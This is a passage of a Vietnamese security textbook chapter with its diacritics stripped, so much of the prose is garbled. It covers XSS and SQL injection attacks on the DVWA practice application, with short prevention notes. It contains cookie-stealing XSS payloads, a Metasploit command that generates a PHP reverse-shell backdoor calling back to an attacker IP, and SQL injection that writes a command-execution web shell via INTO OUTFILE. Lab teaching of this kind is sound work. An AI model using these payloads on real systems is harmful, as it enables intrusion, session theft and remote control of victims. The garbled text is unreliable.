phn mm dit virus, backdoor c uy tnh trn th trng trnh b li dng.

86

Chng 7: WEB HACKING VI DVWA

I. Gii thiu i vi nhng chng ta mi nghin cu hacking, mi trng th nghim l rt

quan trng, tuy nhin tm c mi trng thc t, ph hp vi trnh li khng n

gin.

Ngc li, i vi nhng ngi c trnh v kinh nghim hacking, chc hn

cc chng ta cng c nhu cu th nghim trnh hacking ca mnh n u cng nh

nng cao thm kh nng bn thn.

Vy th DVWA- Damn Vulnerable Web Application c th p ng nhu cu

ca c nhng ngi mi vo cng nh nhng ngi c trnh nht nh. DVWA

l mt framework xy dng sn nhng l hng bo mt theo top 10 im yu bo

mt Web ca OWASP. Trnh t mc low n high c th p ng nhu cu hack ca

rt nhiu ngi.

Vy DVWA l mt ng dng web PHP / MySQL b li. Mc tiu chnh ca n

l gip cho cc chuyn gia an ninh kim tra k nng v cng c ca h trong mt mi

trng hp php, gip cc nh pht trin web hiu r hn v cc qu trnh m bo cc

ng dng web v h tr gio vin / hc sinh ging dy / hc bo mt ng dng web

trong mt mi trng lp hc.

II. Hng dn ci t DVWA trn Backtrack Do y l framework trn nn php nn n gin cc chng ta dng

webserver bng XAMPP trc, ri copy DVWA vo, chng ta s s dng DVWA trn

giao din web.

1. Ti v ci t XAMPP V y l phn mm m ngun m, nn cc chng ta hy vo trang ch ca

XAMPP http://www.apachefriends.org/en/xampp.html ti phin bn mi nht v

my.

87

Sau khi download XAMPP v, cc chng ta vo Terminal v g lnh nh

hnh bn di

Khi ng XAMPP ln

88

Sau cng l m trnh duyt web ln v g http://localhost ta s c giao din

chnh ca XAMPP nh hnh bn di:

2. Ti v ci t DVWA Cc chng ta vo link http://www.dvwa.co.uk/ ti DVWA v my

89

Sau tin hnh gii nn file va download v v t vo th mc

/opt/lampp/htdocs/

Vo trnh duyt web v g http://localhost/dvwa/ ta c giao din chnh ca

DVWA nh sau :

90

Ch :

Phi bt XAMPP ln trc th mi c th chy DVWA.

Ti giao din ng nhp ca DVWA, cc chng ta ng nhp bng acc/pass mc nh l admin/password.

Chun b trc khi tn cng:

M trnh duyt web, g: localhost/dvwa. C th s dng dia_chi_ip/dvwa

91

khai thc cc li trn DVWA(XSS, SQL Injection), chng ta phi thit lp

Security Level l Low. V khi , nhng on code c thm vo s c gi

nguyn. Vi mc High, s dng hm htmlspecialchars() chuyn cc k t c bit,

khng ging vi lc nhp ban u. mc Medium, chui s b xa i nn

khng bi nh hng. Tuy nhin, cc th html khc vn b nh hng bnh thng.

V th chng ta thit lp Security Level l low: Chn DVWA Security -> Low

-> Submit

92

III. Cc k thut tn cng trn DVWA

1. XSS (Cross-Site Scripting)

a) Gii thiu

Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS

trnh nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng

bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay

nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc.

Trong , nhng on m nguy him c chn vo hu ht c vit bng cc

Client-Site Script nh JavaScript, JScript, DHTML v cng c th l c cc th

HTML.

XSS l mt trong nhng li ph bin, c rt nhiu trang web b mc phi li

ny, chnh v th ngy cng c nhiu ngi quan tm n li ny!

b) Phn loi XSS

XSS c th c phn loi nh sau:

Stored XSS Attacks

Stored XSS l hnh thc tn cng m cho php k tn cng c th chn

mt on script nguy him (thng l Javascript) vo website ca chng ta thng qua

mt chc nng no (vd: vit li bnh, guestbook, gi bi..), t khi cc thnh

vin khc truy cp website s b dnh m c t k tn cng ny, cc m c ny

thng c lu li trong database ca website chng ta nn gi l Stored. Stored XSS

pht sinh do chng ta khng lc d liu do thnh vin gi ln mt cch ng n,

khin cho m c c lu vo Database ca website.

93

Reflected XSS Attacks

Trong hnh thc ny, k tn cng thng gn thm on m c vo URL ca

website chng ta v gi n nn nhn, nu nn nhn truy cp URL th s b dnh m

c. iu ny xy ra do ta khng ch filter input t URL ca website mnh.

XSS Attack Consequences Phng php ny tng t nh 2 phng php trn. Tuy nhin, im khc bit

l cch m payload c a ti server. Mt site read only hay brochureware

cng c thn him XSS. XSS c th gy thit hi t mc nh n ln nh vic

chim ti khon ca ngi s dng. Mt cuc tn cng XSS c th ly c session

cookie, gy mt ti khon s dng. Hoc c th nh hng ti d liu ngi dng u

cui bng cch ci t Trojan, hoc redirect trang web ngi truy cp sang mt trang

khc, hoc thay i ni dung ca mt trang.

c) Tm hiu v hot ng XSS

V c bn, hot ng ca XSS c th c m t nh sau:

94

M t hot ng ca XSS

Theo nguyn tc trn, mt hacker c th li dng cc l hng bo mt t

mt website. Cc th HTML u c th l cng c cho cc cuc tn cng bi k thut

XSS, trong 2 th IMG v IFRAME c th cho php trnh duyt load thm cc

website khc khi cc lnh HTML c hin th. Li dng nguyn tc ny, cc hacker

c th chn cc on m c vo v khin my nn nhn b tn cng XSS

d) Tc hi ca XSS

XSS thng c s dng vi cc mc ch sau:

nh cp thng tin

Gip hacker c th truy cp c vo nhng thng tin nhy cm

Ly c quyn truy cp min ph vo nhng ni dung ng ra phi tr

tinmi c c

D xt s thch ca ngi s dng mng

Thay i din mo ( deface) mt trang web no

Tn cng t chi dch v (DoS)

M JavaScript c c th truy cp bt c thng tin no sau y:

- Cookie c nh (ca site b li XSS) c duy tr bi trnh duyt.

- RAM Cookie (ca site b li XSS).

- Tn ca tt c cc ca s c m t site b li XSS.

- Bt c thng tin m c th truy cp c t DOM hin ti (nh

value, m HTML).

95

e) Tn cng XSS

Thc hin script: alert(XSS); hin thng bo trn trnh

duyt web

Kt qu nhn c thay v ch lu vo c s d liu:

Xem cookie ca ngi dng:

alert(document.cookie);

96

Chng ta c th gi cookie ny v trc tip my tn cng thay v ch hin ln

mn hnh.

Chng ta c th chn cc th iframe vo:

Ngoi ra, chng ta c th s dng Metasploit Framework (gii thiu trn)

tn cng chim quyn iu khin cng vi backdoor cho php my tnh mc tiu kt

ni li. Code to backdoor:

Msfpayload php/meterperter/reverse_tcp lhost=192.168.10.102 lport=4444

R > forum.php

97

Dng msfconsole v thit lp cc thng s cn thit lng nghe kt ni trn

server:

Tr li XSS Stored, ta s dng script:

98

Windows.

Sau khi thc thi script trn xong, Metasploit Framework m kt ni n v

chng ta c th tn cng.

Mt s hnh nh tn cng:

100

f) Mt s phng php phng nga v ngn chn

Ngi ta khng lng ht c mc nguy him ca XSS nhng cng khng

qu kh khn ngn nga XSS. C rt nhiu cch c th gii quyt vn ny.

OWASP (The Open Web Application Standard Project) ni rng c th xy dng

cc website bo mt cao, i vi cc d liu ca ngi s dng, nn:

Ch chp nhn nhng d liu hp l.

T chi nhn cc d liu hng.

Lin tc kim tra v thanh lc d liu.

Nhng ngi pht trin web c th bo v website ca mnh khi b li dng

thng qua tn cng XSS, bng cch m bo nhng trang pht sinh ng khng cha

cc tag ca script bng cch lc v xc nhn hp l cc d liu u vo t pha ngi

dng hoc m ha(endcoding) v lc cc gi tr xut cho ngi dng.

2. SQL Injection

a) SQL Injection l g?

SQL Injection l mt trong nhng kiu hack web ang dn tr nn ph bin

hin nay. Bng cch inject cc m SQL query/command vo input trc khi chuyn

cho ng dng web x l, chng ta c th login m khng cn username v password,

remote execution, dump data v ly root ca SQL server. Cng c dng tn cng l

mt trnh duyt web bt k, chng hn nh Internet Explorer, Firefox, Google Chrome,

...

101

b) Cc bc khai thc l hng trang web

Vo trang http://localhost/dvwa/, chn SQL Injection (Blind):

Chng ta bt u khai thc li t nhp liu User ID:

Nhp vo: 1

Nu nhp vo:1 or 1=1hoc 1 or =#ta c kt qu rt bt ng

102

Du # c s dng loi b tc dng ca du () sau cng trong cu lnh

truy vn sql:

SELECT first_name, last_name FROM users WHERE user_id =

$user_id

Xem tn c d liu: a UNION select 1, database();#

Xem user v system user: a UNION select system_user(), user();#

103

Xc nh tn user m ngi dng ang s dng v phin bn ca MySQL

Xem tt c cc tn c s d liu cng cc bng c trong h qun tr csdl

MySQL:

a UNION select table_schema, table_name, from

information_schema.tables;#

Chng ta c th thm mnh iu kin WHERE gii hn li kt qu

a UNION select table_schema, table_name, from information_schema.tables

where table_schema=dvwa;#

104

Lit k cc column trong bng:

a UNION select table_name, column_name, from

information_schema.columns where table_schema=dvwa;#

Tip tc thc hin cu lnh sau:

' union select '','' into outfile C:\\xampp\\htdocs\\sqlinjection.php' ;#

Sau khi tao xong, chng ta ch cn thc hin lnh trn trnh duyt, pha sau chui

?cmd=cu lnh. V d: 192.168.10.20/sqlinjection.php?cmd=dirta c:

105

By gi ta c ton quyn iu khin my tnh ca victim.

a) Cc phng n phng chng SQL Injection

i password mc nh ca user root

Xo tt c cc th tc c mc nh lu tr trn server

Lc nhng k t c th gy hi nh ,,,:,# ngay t khi nhn yu cu truy vn t bn ngoi

Update SQL vi nhng bn mi nht

Kho cc t kha nhy cm i vi SQL bng cch dng firewall chn ngay t u vo

M ha password

Loi b nhng t kha SELECT, DELETE, INSERT, trong cu truy vn t bn ngoi.

106

TI LIU THAM KHO

[1] McGraw Hill Osborne,Media Hacking Exposed Sixth Edition Network

Security Secrets And SolutionsJan 2009

[2] Gordon Fyodor Lyon, Nmap Network Scanning: The Official Nmap

Project Guide to Network Discovery and Security Scanning

[3] www.wikipedia.org

[4] www.google.com.vn

Remote Desktop Protocolchuong 7: web hocking voi DVWA

Documents

Athena-Su dung BackTrack 5 de khai thac lo hong mang.pdf